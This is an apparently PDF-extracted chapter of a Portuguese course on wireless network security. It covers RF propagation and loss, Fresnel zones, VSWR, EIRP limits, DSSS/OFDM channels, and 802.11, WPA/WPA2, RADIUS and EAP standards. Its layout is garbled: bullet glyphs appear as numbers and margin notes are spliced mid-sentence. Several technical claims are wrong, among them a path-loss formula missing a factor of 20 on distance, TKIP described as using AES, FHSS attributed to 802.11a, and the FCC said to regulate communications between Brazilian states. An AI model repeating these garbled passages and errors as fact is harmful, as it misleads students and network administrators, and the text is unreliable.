11 Interferências externas: outras fontes de sinais de rádio, Bluetooth (802.15.1), fornos de


micro-ondas, telefones sem fio, entre outras aplicações que utilizem sinais de rádio em
frequências iguais ou próximas às de Wi-Fi (2.4 GHz).

11 Pode ocorrer ganho no sinal pelo uso de antenas e amplificadores AC. De maneira
contrária, o comportamento do sinal pode causar perda de sinal se houver diferença de
impedância entre cabos e conectores.

11 Perda de sinal por fenômenos físicos que afetam a intensidade, o trajeto e outras caracte-
rísticas das ondas de rádio.

Capítulo 1 - História, padrões e fundamentos de radiofrequência


Ganho e perda de sinal
Ganho: q
11 Unidade: dBi.

11 Aumento na amplitude de um sinal de RF.

11 Normalmente é um processo ativo, mas pode ser passivo por sinais refletidos.

Perda:

11 Diminuição na força de um sinal RF, inversamente proporcional à distância percorrida.

11 Diversos fatores podem causar perda.

Aumentar a potência do sinal pode produzir consequências positivas ou negativas. Como


podemos constatar em experimentos com OpenWRT, aumentar a potência do Intentional
Radiator (IR), a potência do transmissor, levando em conta perdas e ganhos de cabos ou conec-
tores e antenas – no caso da interface de rede do Access Point –, pode aumentar o ruído do sinal.

5
O ganho de uma antena é passivo e medido em dBi, ou seja, decibéis com um radiador
isotrópico (como o sol). Isso significa que uma antena altera o padrão de radiação, não
aumentando a potência de entrada do sinal.

A perda em um sinal RF ocorre principalmente pela dispersão do sinal; à medida que o sinal
trafega pelo ar, sua potência diminui a uma taxa inversamente proporcional à distância per-
corrida. Para efeito de ilustração, depois de percorrer 100 metros, um sinal de RF normal-
mente sofre uma perda de cerca de 80 dB. Se o sinal percorre mais 100 metros, a perda é de
cerca de 86 dB. A perda (path loss) é expressa pela seguinte fórmula:

Perda (dB) = 32,5 + 20 log F + log d

Onde: “F” é a frequência e “d” é a distância em metros.

Causas de perda
Reflexão
11 Similar à reflexão da luz. q
11 Sinal pode se manter o mesmo.

11 Multipath: múltiplas reflexões.

Ângulo de incidência é igual Objeto Imagem virtual


ao ângulo de reflexão

i r i
r

i
ray box r A imagem parece estar
Figura 1.1
por trás do espelho
Exemplo de
reflexão.

Reflexões ocorrem quando o objeto é grande, comparado com o comprimento da onda.


Por mais lisa e regular que seja a superfície – do ponto de vista macroscópico – sempre
l
Observe que a
haverá perda, seja por absorção ou por espalhamento do sinal. característica de
múltiplos caminhos
A reflexão de sinais de RF é semelhante à da luz, ou seja, o ângulo de incidência (entre o sinal das ondas foi
que chega e a superfície) é o mesmo do ângulo de reflexão (entre o sinal e a superfície em aproveitada no
conceito de Multiple-
que refletiu) se não houver irregularidades na superfície.
-Input Multiple-Output
(MIMO), para
Espalhamento aumentar a taxa física

q
de transferência de
Obstáculo pequeno comparado com o comprimento de onda. dados no padrão IEEE
Segurança em Redes sem Fio

802.11n. Dotados de
Tipos: múltiplas antenas de
transmissão e
11 Onda se depara com uma superfície irregular e é refletida em várias direções. recepção, os equipa-
11 Ondas se refletem em uma escala menor, em partículas pequenas. mentos da próxima
geração de WLAN
Sinal resultante é fraco demais. atingirão velocidades
de 108 mpbs, graças a
O fenômeno do espalhamento pode ocorrer de duas formas. Uma delas é quando uma onda este problema das
redes 802.11a/b/g.
se depara com uma superfície irregular e é refletida em muitas direções simultaneamente.

6
Depois que isso ocorre, o sinal pode se dividir em vários sinais resultantes, que podem ter
intensidade insuficiente para ter utilidade para o receptor.

Outra forma de espalhamento ocorre quando as ondas atravessam um meio com partículas
em suspensão. Como exemplo de espalhamento, citamos uma onda atravessando uma região
com alta densidade de poeira suspensa no ar, fenômeno típico do ambiente de certas fábricas.

Difração
11 Fenômeno confundido com refração – onda atravessando um meio diferente. q
11 Ondas de RF contornando um obstáculo.

11 Compare com ondas na água contornando um objeto na superfície.

em torno de uma aresta

a uma abertura estreita

a uma grande distância

Capítulo 1 - História, padrões e fundamentos de radiofrequência


Figura 1.2
A difração.

l Quando as ondas passam por um espaço pequeno ou em torno de um objeto pequeno,


Saiba mais ocorre mudança na direção da onda. Esse fenômeno, que também pode causar perda no
sinal, se chama difração. Para que esse fenômeno ocorra, o tamanho do obstáculo deve ser
A difração ocorre em
todas as formas de menor que o comprimento de onda.
ondas progressivas –
eletromagnéticas, som
Refração
q
e água – e explica por
que ondas de rádio
11 Mudança na direção das ondas ao passar por um meio diferente.
longas contornam
montanhas mais facil- 11 Mais comum em transmissões de longa distância.
mente que ondas de
rádio curtas.

7
Ar

Água

Profundidade aparente

Profundidade real

Imagem do objeto Figura 1.3


O fenômeno
chamado de
refração.

Outra causa comum de perda do sinal RF é a refração, a mudança na direção das ondas
ao passar de um meio para outro, com densidade diferente. Esse fenômeno pode ocorrer
quando as ondas atravessam o vidro; quando, por exemplo, passam por um aquário (ar,
vidro, água, vidro e ar novamente, sem levar em conta outros fenômenos). O índice de
refração do meio determina a mudança no ângulo de propagação da onda.

É bom lembrar que um mesmo tipo de meio pode ter índices de refração diferentes,
e o mais comum de se constatar é a diferença entre ar frio e ar quente. Refração não
é um problema para pequenos ambientes, mas sim para a transmissão entre pontos
distantes e sujeitos a mudanças de condições atmosféricas.

LOS
11 Line of Sight ou Linha de Visada. q
11 Linha aparente que liga receptor e transmissor.

11 Considerar a curvatura da Terra para longas distâncias.

11 Zona Fresnel (“fra-NEL”) não pode ser obstruída.

r
Segurança em Redes sem Fio

r (em metros) = 17.32 x d (em Km)


r (em pés) = 72.05 x d (em milhas) Figura 1.4
4f (em GHz) 4f (em GHz) LOS e a Zona
Fresnel.

Como já comentamos anteriormente, obstáculos entre o transmissor e o receptor podem


causar diversos tipos de perda. Entretanto, não mencionamos em nenhum momento qual
deve ser a área livre de obstruções.

8
Considere uma linha imaginária que liga transmissor e receptor, considerando a curvatura
da Terra para longas distâncias. LOS é essa linha imaginária que liga os dois pontos.

Entretanto, apenas uma linha reta desobstruída não é suficiente para ondas RF, pois se uma
determinada área em torno da LOS é obstruída, o sinal RF pode sofrer interferência. Essa
área imaginária é denominada Zona Fresnel (pronuncia-se “fra-NEL”) e tem seu raio calcu-
lado da seguinte forma:

R = 17,32 x √d/4f, onde:

d = distância do link em Km
F = frequência em GHz
r = raio em metrosEmbora obstruções de 20 a 40% da Zona Fresnel causem pouco impacto
no link, é recomendável que não haja obstrução alguma nessa área.

VSWR
11 Voltage Standing Wave Radio. q
11 Ocorre quando impedâncias de cabos e conectores não combinam; reflexão de
corrente de volta para o transmissor.

11 Não possui unidade de medida.

22 1:1 VSWR perfeito.

22 1.5:1 VSWR típico.

11 Pode causar danos a um equipamento que não prevê essa falha de instalação.

A impedância, medida em Ohms, é a medida da resistência ao fluxo de corrente. Maior resis-


tência significa menos corrente atravessando o componente, ou seja, se a corrente passa de
um componente elétrico com impedância menor (50 Ohms, por exemplo) para outro compo-
nente com impedância maior (75 Ohms), o fluxo de corrente é reduzido.

Essa redução no fluxo é indicada por Voltage Standing Wave Ratio (VSWR), a razão entre
a impedância do dispositivo e a impedância perfeita, denotada pelo valor 1. Um valor de
VSWR perfeito é 1:1, o valor típico é 1.5:1. Um valor de VSWR maior que o típico pode causar
retorno de sinal para o equipamento que, se não possuir proteção, poderá ser danificado.

Capítulo 1 - História, padrões e fundamentos de radiofrequência


VSWR pode ser evitada simplesmente pela combinação correta de impedâncias de cabos,
conectores e dispositivos. A impedância típica é de 50 Ω.

Antenas – Ganho
11 Dispositivo passivo. q
11 Transforma sinais de RF em ondas de rádio no ar.

11 Campos elétricos emitidos são chamados de raios ou lóbulos.

11 Beamwidth é a medida em graus do foco de radiação.

11 Categorias de antena:

22 Omnidirecional.

22 Semidirecional.

22 Altamente direcional.

Antenas são dispositivos que convertem sinais de RF em ondas de rádio no ar. São disposi-
tivos passivos, ou seja, não aumentam a potência do sinal RF.

9
Existem três categorias genéricas de antena, cada uma delas com ganhos adequados a um
determinado tipo de aplicação. Antenas omnidirecionais são as mais comuns, encontradas
tanto no AP quanto nos clientes. Transmitem e recebem ondas de RF em 360º em torno do seu
eixo, normalmente horizontal – perpendicular à superfície da Terra. As outras categorias de
antena – semidirecional e altamente direcional – têm aplicações diferentes, tais como links de
grandes distâncias ou mesmo atividades de auditoria como wardriving e warwalking.

Ao focar o raio da antena, o ganho da antena (em dBi) aumenta. O chamado “beamwidth” é a
medida desse foco, ou seja, a largura do sinal RF que a antena transmite.

Potência de radiação
11 Intentional Radiator (IR). q
11 Qualquer equipamento que irradia sinais de RF.

11 Potência de saída, sem considerar antena.

22 Leva em consideração perda de potência em cabos e conectores.

22 Access Point.

33 Apenas dispositivo de RF em si, cabos e conectores.

Intentional Radiator (IR) é um termo que descreve um sistema responsável por irradiar sinais
de RF. No caso de um Access Point, o IR é composto de todos os elementos do dispositivo
(transmissor, cabos e conectores), exceto a antena.

É muito importante distinguir IR de EIRP, conceito que veremos a seguir. Embora órgãos
como FCC e Anatel não definam um IR máximo permitido, é bom lembrar que, depois de
combinado com uma antena, o sinal RF emitido por um IR pode facilmente ultrapassar os
limites permitidos.

Equivalent Isotropically Radiated Power (EIRP)


11 IR acrescido do ganho da antena: potência de saída de todo o conjunto. q
11 WLAN exige comunicação em duas vias para associação.

22 AP “enxerga” o cliente.

22 Cliente “enxerga” o AP.

22 Para auditar redes, basta que o cliente capte os sinais dos APs e de outros clientes
– antena de alto ganho.

Equivalent Isotropically Radiated Power (EIRP) é a potência irradiada pelo sistema de RF


como um todo, ou seja, Intentional Radiator (IR) e antena. É muito importante que o admi-
nistrador de uma rede sem fio conheça o valor estimado do EIRP, uma vez que órgãos como
a Federal Communications Commission (FCC) e a Agência Nacional de Telecomunicações
determinam uma potência máxima para o transmissor. A seguir, serão apresentados alguns
Segurança em Redes sem Fio

conceitos básicos de “matemática RF”, que serão úteis no cálculo desse valor.

Nos EUA, a FCC determina que o EIRP não pode exceder 1 watt, para aplicações em
ambientes fechados, e 4 watts para ambientes abertos. No Brasil, a Anatel determina que
na faixa de frequência que engloba as redes 802.11b/g, o EIRP (ou seja, o IR acrescido de
ganho da antena) não pode exceder 400 mW em cidades com mais de 50 mil habitantes.
Não é difícil exceder esse limite, levando em consideração a potência comum das interfaces
de rede (50-100 mW) e o ganho obtido com antenas. As condições de uso são descritas na
Resolução 506 da Anatel, de 1º de julho de 2008.

10
Para que um cliente seja capaz de se associar a um AP, é necessário que a intensidade de sinal
deste último seja suficiente. Assim, um auditor que capte sinais de uma rede com o auxílio de
uma antena semidirecional será capaz de se associar à rede somente se o AP também for capaz
de captar seus sinais de RF. É necessário, portanto, que ambos os pontos se “enxerguem”.

Matemática RF
11 Ganho e perda medidos em decibéis (dB). q
11 dBm: 1 milliwatt (1 mW) referência de potência absoluta.

11 dBi: mesma medida de dBm, mas tem como referência um irradiador isotrópico (sol).

11 Escala logarítmica:

22 -3dB: metade da potência em mW.

22 +3dB: dobro da potência em mW.

22 -10dB: um décimo da potência em mW.

22 +10dB: aumenta em 10 vezes a potência em mW.

11 +23 dBm = 10 + 10 + 3 = aumenta em 200 vezes.

Um link de RF deve ter potência compatível com aquela determinada pelos órgãos regu-
ladores. Para que o administrador da rede seja capaz de assegurar que isso não acon-
teça, é necessário que ele conheça o básico de “matemática RF” para calcular o valor do
EIRP de seus APs.

Ao calcular a potência de sua WLAN, o administrador deve levar em consideração alguns fatores:

11 Perdas e ganhos de cabos e conectores;

11 Intentional Radiator (IR);

11 Potência do dispositivo transmissor;

11 Equivalent Isotropically Radiated Power (EIRP).

Alguns valores-chave devem ser conhecidos antes de se iniciar o cálculo: uma antena com
ganho de 3 dB duplica a potência do IR, enquanto uma antena com ganho de 10 dB aumenta
em dez vezes a potência do IR. Dispositivos como atenuadores causam o efeito contrário, ou
seja, reduzem o valor de IR na mesma proporção. Lembre-se de que as perdas com cabos e

Capítulo 1 - História, padrões e fundamentos de radiofrequência


conectores devem ser levadas em consideração no cálculo da potência do IR. A seguir, você
pode ver um exemplo para facilitar o entendimento:

Access Point (100 mW) + cabo (~ -2 dB) + conectores (~ -1 dB) + antena de 10 dB = (100 mW/2)
* 10 = 500 mW

Exercício de fixação 1 e
Fundamentos de radiofrequência
1. Quais são as causas de perda de um sinal RF?

11
2. Que fatores um administrador de rede deve levar em conta para calcular a potência de
sua WLAN?

Tecnologias de transmissão
Espalhamento espectral (Spread Spectrum): q
11 Energia média do sinal transmitido é espalhada sobre uma largura de faixa muito
maior do que a largura de faixa que contém a informação.

11 Grande largura de banda e baixa potência de pico.

Spread Spectrum é uma tecnologia de transmissão que tem como características principais a
grande largura de banda e a baixa potência de pico. Sinais transmitidos por Spread Spectrum
são como ruído, difíceis de serem interceptados ou demodulados sem equipamento adequado.

Essa tecnologia compensa o uso de uma maior largura de faixa de transmissão com uma
melhora na rejeição aos sinais interferentes de outros sistemas operando na mesma faixa
de frequência. Essa característica é especialmente interessante para WLANs, uma vez
que outros tipos de equipamento operam na mesma frequência, como telefones sem fio,
Bluetooth e fornos de micro-ondas.

Implementações de Spread Spectrum


FHSS: q
11 802.11: 1ª geração, Bluetooth, babás eletrônicas e telefones sem fio.

DSSS:

11 802.11, 802.11b e 802.11g.

OFDM:

11 802.11ª.

11 Orthogonal Frequency Division Multiplexing (OFDM).

11 Transporte de camada física em alta velocidade.

Somente duas implementações de Spread Spectrum são especificadas pela FCC: Frequency
Hopping Spread Spectrum (FHSS) e Direct Sequence Spread Spectrum (DSS). Considerando
que a FCC é um dos principais órgãos reguladores do mundo, podemos afirmar que essas
são as principais tecnologias de Spread Spectrum utilizadas. Orthogonal Frequency Division
Multiplexing (OFDM) não é uma implementação de Spread Spectrum, mas é o principal
transporte de camada física de redes sem fio de alta velocidade.
Segurança em Redes sem Fio

Veremos, a seguir, conceitos básicos das tecnologias de Spread Spectrum mais utilizadas:
DSSS e OFDM.

12
Direct Sequence Spread Spectrum (DSSS)
11 Maiores taxas de transferência que FHSS e mais sujeito a interferências. q
11 Padrão IEEE para DSSS na faixa 2.4 GHz ISM:

22 1 a 2 Mbps para 802.11 (não é 802.11a).

22 5.5 e 11 Mbps para 802.11b.

22 54 Mbps para 802.11g, 5.5 e 11 Mbps para compatibilidade com 802.11b.

Direct Sequence Spread Spectrum (DSSS) é a tecnologia de Spread Spectrum mais utilizada,
principalmente por oferecer taxas de transmissão de dados mais altas do que FHSS. Dife-
rente de FHSS: tecnologia usada em Bluetooth e 802.11a – DSSS é mais suscetível a interfe-
rências por outras aplicações que usem as mesmas frequências.

11 Cada canal tem 22 MHz de largura. q


22 Canal 1:

33 2.401 GHz a 2.423 GHz

33 Frequência central 2.412 GHz

11 Adicione 5 à frequência central para obter a frequência do próximo canal.

11 Adicione e subtraia 11 para obter o intervalo de spread (espalhamento) do canal.

22 Canais 1-11 para os EUA.

22 Canais 10-13 para a França.

22 Canal 1-14 para o Japão.

DSSS é um método de envio de dados no qual tanto o sistema transmissor quanto o


receptor operam num conjunto de frequências numa abrangência de 22 MHz. A frequência
selecionada em uma interface de rede é a frequência central do canal; isso quer dizer que,
para o canal 1, a frequência central é de 2.412 GHz, mas o canal inclui a faixa de frequências
que vai de 2.401 GHz a 2.423 GHz, mais e menos 11 MHz, respectivamente. A frequência
central do canal 2 é obtida somando 5 à frequência central do canal 1, ou seja, 2.412 GHz +
5 MHz = 2.417 GHz. Note que, entre o canal 1 e o 2, há uma faixa de frequências sobreposta,
problema que abordaremos a seguir.

Capítulo 1 - História, padrões e fundamentos de radiofrequência


Figura 1.5 No Japão, é utilizado o canal 14 (2.487 GHz). Já a Europa possui 13 canais, sendo que a França faz
Os canais, com uso apenas dos canais de 10 a 13. É interessante observar que a interface de rede (e respectivo
destaque para a
não sobreposição driver) à disposição do auditor deve permitir operação no canal 14. Atacantes podem instalar
dos canais Access Points inadvertidamente, usando esse canal com o objetivo de se tornarem “invisíveis”
utilizados no Brasil. para um administrador que monitora apenas os canais mais típicos, de 1 a 11.

Canais

1 2 3 4 5 6 7 8 9 10 11 12 13 14

2.402 GHz 22 MHz 2.483 GHz

13
Como vimos antes, a alocação dos canais em redes 802.11b/g tem algumas características básicas:

11 Início nos canais 1 a 2.412 GHz, término nos canais 11 a 2.462 GHz;

11 Incrementos de 5 MHz (frequência central);

11 Canais com largura de 22 MHz;

11 Canais 12 a 14 fora dos EUA.

Visualizando canal a canal em um gráfico, fica claro que há sobreposição entre os canais.
Isso significa que, se houver um AP operando no canal 1 e outro no mesmo ambiente, ope-
rando no canal 2, haverá colisões e, consequentemente, retransmissão de pacotes.

Para evitar que colisões aconteçam, recomenda-se a seguinte distribuição de canais na


implantação de Access Points em um mesmo ambiente:

11 Apenas 3 canais não se sobrepõem: 1, 6 e 11;

11 Sobreposição mínima: canais 1, 4, 8 e 11.

1 1

11 11 Figura 1.6
Projeto de rede
WLAN com
1 utilização de
intersecção de
células com canais
não sobrepostos.

Orthogonal Frequency Division Multiplexing (OFDM)


11 IEEE 802.11a. q
11 Maior throughput: cada subcanal usado em paralelo.

11 Cada canal tem 20 MHz de largura.

22 52 subcanais (DSSS tem apenas 1).

22 48 para transmissão de dados e 4 para monitoração.

11 Não usa Spread Spectrum, como FHSS e DSSS.

11 Uso de banda de 5 GHz.

11 DSSS é uma “torneira”.

11 OFDM é um “chuveiro”.
Segurança em Redes sem Fio

Orthogonal Frequency Division Multiplexing (OFDM), diferente de FHSS e DSSS, não usa os
princípios de Spread Spectrum na comunicação. É o mecanismo de transmissão de camada
física utilizado por redes 802.11a, que opera a 5 GHz em de 2.4 GHz, como 802.11b/g.

OFDM organiza a camada física em canais de operação que operam em paralelo. Cada canal de
20 MHz com 52 subportadoras, 4 delas usadas para monitoração. Cada um desses 48 subcanais
é usado para transmitir dados, o que aumenta consideravelmente a taxa de transmissão.

14
Lower and Middle U-NII Bands: 8 Carriers in 200 MHz / 20 MHz Spacing

30 MHz 30 MHz

5150 5180 5200 5220 5240 5260 5280 5300 5320 5350
Lower Band Edge Upper Band Edge

Upper U-NII Bands: 4 Carriers in 100 MHz / 20 MHz Spacing

20 MHz 20 MHz

Figura 1.7
Imagem que ilustra
as portadoras em 5725 5745 5765 5785 5805 5825
50 GHz. Lower Band Edge Upper Band Edge

Intersecção em canais OFDM:

11 A largura de banda ISM de 5GHz não é contínua. Existem duas áreas: 5.15GHz – 5,35GHz e
5.725GHz – 5.825GHz;

11 As subportadoras dos sinais OFDM são moduladas de tal forma que, embora os “ombros”
dos canais adjacentes se sobreponham, os sinais não interferem uns nos outros, pro-
vendo assim 8 canais sem sobreposição na primeira área (5.15GHz - 5,35 GHz) e 5 canais
sem sobreposição na segunda (5.725GHz - 5.825GHz).

Para ilustrar melhor a diferença entre DSSS e OFDM, pense em:

11 DSSS (22 MHz) como uma “torneira”, um único subcanal;

11 OFDM (20 MHz) como um “chuveiro”, com 52 subcanais diferentes.

Vantagens: q
11 Maior frequência, menor alcance.

Capítulo 1 - História, padrões e fundamentos de radiofrequência


11 Lida melhor com multipath (múltiplas reflexões).

11 Atualmente sujeito a menor interferência – faixa pouco usada.

22 Frequência de 5 GHZ – segurança por obscuridade.

Desvantagens:

11 Menor alcance.

11 Equipamentos mais caros.

11 Não compatível com 802.11b/g.

Multiple-Input, Multiple-Output (MIMO) é baseado nesta modulação e na frequência de 5 GHz.

Como vantagens da OFDM, podemos citar a menor possibilidade de interferência por


multipath devido às técnicas de modulação usadas. Outras vantagens são a maior taxa de
transferência e a menor probabilidade de interferência, uma vez que a faixa de frequência
de 5 GHz é menos “povoada” que 2.4 GHz.

15
Mas OFDM também tem algumas desvantagens, e as principais são a abrangência menor,
comparada a redes 2.4 GHz, e a falta de interoperabilidade com equipamentos 802.11b e
802.11g. Pode-se considerar, como outra desvantagem, o preço de equipamentos 802.11a,
mais alto do que os populares 802.11b e 802.11g.

Exercício de fixação 2 e
Tecnologias de transmissão
O que são DSSS e OFDM?

Organizações e padrões
Vamos conhecer agora as organizações que definem os padrões usados em redes 802.11 q
e 802.11a/b/g, além de alguns padrões, como WPA2, WPA2, IETF e IEEE.

Organizações:

11 US Federal Communications Commission (FCC).

11 Agência Nacional de Telecomunicações (Anatel).

11 Institute of Electrical and Electronics Engineers (IEEE).

11 Internet Engineering Task Force (IETF).

11 Wi-Fi Alliance.

11 European Tellecomunications Standards Institute (ETSI).

Embora não seja essencial, é interessante conhecer um pouco sobre as organizações que
definem os padrões usados em redes 802.11 e 802.11a/b/g. Conhecendo as organizações,
poderemos distinguir um padrão (802.11b) de um selo de interoperabilidade, assim como os
definidos pela Wi-Fi Alliance.

11 FCC: regulamenta comunicações entre estados brasileiros e ligações internacionais nos


EUA. Determina que a potência máxima de saída é 1W (30 dBm), e que o EIRP máximo é 4 W
(36 dBm). Determina quais são as bandas livres de licença, chamadas de ISM (Industrial,
Scientifical and Medical) nos EUA;

11 IEEE: desenvolve padrões de camada 1 e 2 (PHY e MAC);

11 IETF: responsável pelas camadas 3 e superiores;

11 Wi-Fi Alliance: garante a interoperabilidade de produtos. Não determina padrões,


é basicamente uma organização de marketing. Determinou duas especificações bem
conhecidas: WPA e WPA2;

11 ETSI: desempenha na Europa o mesmo papel do IEEE.


Segurança em Redes sem Fio

Padrões Wi-Fi Alliance


WPA
11 Wi-Fi Protected Access (pré-padrão) q
11 Missão de substituir WEP (Wired Equivalent Privacy).

11 Temporal Key Integrity Protocol (TKIP) como cipher suite.

16
11 RC4 como algoritmo de criptografia. q
22 WEP também emprega RC4.

11 Baseado na versão draft de 802.11i (2003).

11 Trabalho conjunto entre o grupo de trabalho 802.11i e Wi-Fi Alliance.

11 Autenticação:

22 WPA Personal – WPA-PSK.

22 WPA Enterprise – 802.1x com EAP.

Ao contrário do que muitos pensam, Wi-Fi Protected Access (WPA) não é um padrão, mas
sim uma certificação de interoperabilidade criada pela Wi-Fi Alliance em 2003. Diferente da IEEE,
que define especificações, a Wi-Fi Alliance cuida de um programa de certificação que atesta que
um dado equipamento tem interoperabilidade garantida com outros equipamentos.

WPA foi criado num trabalho conjunto entre IEEE e Wi-Fi Alliance para sanar as vulnerabili-
dades de WEP enquanto o padrão 802.11i não era concluído, fato que ocorreu somente em
2004. O padrão 802.11i também é conhecido como WPA2 e emprega o novo cipher suite TKIP,
que emprega o algoritmo de criptografia Advanced Encryption Standard (AES) no lugar do RC4
utilizado em WEP. Um dos requisitos de seu desenvolvimento foi a necessidade de ser implan-
tado como atualização de software, ou seja, utilizando o mesmo hardware de WEP.

WPA emprega Temporal Key Integrity Protocol (TKIP), que substitui WEP por um novo algo-
ritmo de criptografia. WPA, assim como Dynamic WEP, também permite que seja utilizado
802.1x associado com um método Extensible Authentication Protocol (EAP) para autenti-
cação, o chamado WPA Enterprise. Tal como WEP, também é possível utilizar autenticação
por chave pré-compartilhada, denominada WPA Personal ou WPA-PSK (Pre-Shared Key).

WPA2
11 Wi-Fi Protected Access 2. q
11 Baseado em 802.11i ratificado (2004).

11 Implementação do cipher suite CCMP com criptografia AES.

11 Normalmente requer novo hardware.

22 AES – mais recursos de processamento que RC4.

Capítulo 1 - História, padrões e fundamentos de radiofrequência


11 Autenticação: WPA2 Enterprise ou WPA2 Personal.

WPA2 é outro selo Wi-Fi Alliance que muitos confundem com padrão. Ele nada mais é do que
a garantia de interoperabilidade entre dispositivos levando em conta a versão ratificada de
802.11i, publicada em 2004. WPA, por sua vez, garantia a interoperabilidade com base na
versão draft de 802.11i, publicada em 2003.

WPA2 implementa o algoritmo de criptografia AES como parte do cipher suite CCMP
(Counter-Mode/Cipher Block Chaining Message Authentication Code Protocol), aprovado
pelo FIPS (Federal Information Processing Standard) como algoritmo para proteção de dados
sigilosos aprovado para aplicações do governo norte-americano. Produtos certificados
como WPA2 são compatíveis com WPA, mas o inverso nem sempre ocorre – WPA2 exige
mais recursos de hardware para processar o algoritmo Advanced Encryption Standard (AES).

Assim como WPA, WPA2 oferece dois modos de operação: WPA2-PSK, também conhecido
como WPA2 Personal, e WPA2 Enterprise. WPA2 por si só é um mecanismo de segurança
pouco explorado, associado a 802.1x e um bom método EAP, como EAP-TLS, torna-se a
opção mais segura de rede sem fio hoje.

17
Padrões IETF
RADIUS: q
11 RFC 2138: Remote Authentication Dial In User Service (RADIUS) e RFC 2139 –
RADIUS Accounting.

11 AP: Network Access Server (NAS) habilitado com 802.1x.

11 Protocolo Authentication, Authorization, Accounting (AAA): protocolo de autenticação


utilizado por 802.1x.

EAP:

11 RFC 3748: Extensible Authentication Protocol.

11 Um dos esquemas de autenticação usado por RADIUS para verificar credenciais.

11 Alguns protocolos: PEAP, EAP-TLS etc.

Dois padrões da IETF são muito importantes em redes seguras: RADIUS e EAP.

Remote Authentication Dial In User Service (RADIUS) é um protocolo (Authentication,


Authorization and Accounting AAA) para aplicações como acesso à rede ou mobilidade IP.
Foi criado originalmente para autenticar usuários de um Internet Service Provider (ISP)
conectando por modem, DSL ou cabo. O acesso à porta só é concedido após a autenti-
cação, assim como ocorre em um Access Point.

Extensible Authentication Protocol (EAP) é um framework de autenticação adotado pelos Framework


padrões WPA (TKIP/RC4) e WPA2 (CCMP/AES) para prover autenticação. EAP provê meca- Em desenvolvimento
de software, é uma
nismos de autenticação, denominados métodos EAP. Os mais comuns em redes sem fio são:
abstração que une
códigos comuns entre
11 EAP-TLS;
vários projetos de
11 EAP-SIM; software provendo uma
funcionalidade genérica.
11 EAP-AKA; Um framework pode
atingir uma funciona-
11 PEAP;
lidade específica, por
11 LEAP; configuração, durante
a programação de uma
11 EAP-TTLS. aplicação.

Neste capítulo, veremos com mais detalhes EAP-TLS, um dos métodos mais seguros atual-
mente. EAP é usado pelo AP, que na arquitetura RADIUS é um Network Access Server (NAS).
Um método EAP pode fornecer um mecanismo seguro de negociação da Pairwise Master
Key (PMK), usada na Capítulo com TKIP (WPA) ou CCMP (WPA2).

Padrões IEEE
Camada física (PHY): q
11 802.11 (2.4 GHz).

11 802.11a (54 Mbps a 5 GHz).


Segurança em Redes sem Fio

11 802.11b (11 Mbps a 2.4 GHz).

11 802.11g (54 Mbps a 2.4 GHz).

11 802.11n (600 Mbps a 2.4 GHz).

Como já vimos na conceituação de DSSS, a camada física é especificada pelos padrões IEEE 802.11,
que determinam frequência de operação e taxa de transferência, entre outros parâmetros.

A seguir, citamos outros padrões 802.11 que apóiam a operação dos padrões que determinam a
operação das interfaces de rede, os conhecidos 802.11, 802.11a, 802.11b e 802.11g e o futuro 802.11n.
18
l
Saiba mais sobre o O padrão 802.11n é a especificação de IEEE para a próxima geração de interfaces 802.11, cuja
padrão IEEE 802.11 em versão draft foi aprovada em janeiro de 2006. Esse padrão emprega uma tecnologia que
“Official IEEE 802.11
Working Group Project aumenta a taxa de transferência física pelo uso de múltiplas antenas, tanto no transmissor
Timelines - 2013-03- quanto no receptor. Essa tecnologia é chamada de Multiple-Input Multiple-Output (MIMO) e
22” e “IEEE P802.11 -
usa transmissão e recepção de múltiplos sinais para aumentar o desempenho da rede.
Task Group N -
Meeting Update”.
Embora já existam equipamentos baseados no draft de 802.11n sendo comercializados, é
bom lembrar que já foram constatados problemas de compatibilidade entre equipamentos
de fabricantes diferentes, bem como interferência em redes 802.11b e 802.11g e alcance
excessivo (400 metros), demasiado se for comparado ao alcance médio de 30 metros
encontrado na maioria dos equipamentos 802.11b e 802.11g. A versão final da especificação
é esperada para novembro de 2009.

Padrões IEEE 802.11


11 802.11i: melhorias para segurança (CCMP e TKIP). q
11 802.11k: Radio Resource Management.

11 802.11m: Corrects and clarifications to IEEE 802.11-1999.

11 802.11p: Wireless Access in Vehicular Environments (WAVE).

11 802.11r: Fast Roaming.

11 802.11s: Wireless Mesh Networks.

11 802.11t: Wireless Performance Prediction.

11 802.11u: Internetworking with External Networks.

11 802.11v: Wireless Network Management.

11 802.11i: padrão já ratificado para melhor segurança. Define o protocolo TKIP para per-
mitir que hardwares mais antigos permitam upgrade (base da certificação WPA) e Robust
Secure Networks (RSN), dirigido a novos hardwares devido aos requerimentos de AES.

11 802.11k: padroniza a maneira como as interfaces lidam com dados de nível de sinal e
ruído, importantes no processo de roaming – associação a outro AP sem que a conexão
seja interrompida. Hoje, fabricantes tratam do evento de roaming de formas diferentes.

11 802.11m: documentação das melhorias e funções que foram agregadas a redes 802.11-1999

Capítulo 1 - História, padrões e fundamentos de radiofrequência


pelos fabricantes, mas não incorporadas à especificação. Também chamada de 802.11ma.

11 802.11p: Wireless Access in Vehicular Environments (WAVE) é uma especificação de


camada física para aplicações veiculares na faixa de 5.9 GHz. Uma das aplicações para
essa especificação é a cobrança de pedágio de veículos, previamente equipados com
sensores que implementem esse padrão.

11 802.11w: o grupo de trabalho 802.11w visa estender a proteção de dados aos quadros de
gerenciamento, resolvendo assim alguns problemas de segurança. Envolve mudanças
por software nos firmwares de clientes e access points. Provê proteção de três formas:

1. Proteção de quadros de gerenciamento broadcast, usando um Message Integrity Code


(MIC) para proteger esses quadros contra forjamento;

2. Proteção de quadros de gerenciamento unicast evitando alguns ataques de Denial of


Service (DoS);

3. Proteção de frames de associação e desassociação, provendo maneiras do cliente


verificar se o frame é válido.

19
Outros padrões IEEE
11 802.11c: Bridge Operation Procedures. q
11 802.11d: operação sob outras regulações.

11 802.11e: QoS e multimídia.

11 802.11h: Spectrum and Transmit Power.

11 802.11j: operação no Japão a 4.9 e 5.1 GHz.

11 802.11p: Wireless Access in Vehicular Environments (WAVE).

11 802.11w: Protection of Management Frames.

11 802.11y: novo padrão para a banda 3.65-3.7 GHz ISM.

Padrões 802.11 inexistentes


11 802.11l: confusão entre L e 1;

11 802.11o: confusão com zero;

11 802.11q: confusão com 802.1q;

11 802.11x: mesmo que 802.11a/b/g (evite essa denominação);

11 802.11z: erro de digitação em um artigo da O’Reilly muito referenciado que, na realidade,


tratava de 802.11a.

Tendências
Convergências. q
11 VoIP Phones:

22 Wi-Fi + Skype, Wi-Fi + SIP.

22 Migração completa da telefonia convencional para certos perfis de usuário.

11 Celular + Wi-Fi.

22 T-Mobilie hotspot@home.

11 Media Players:

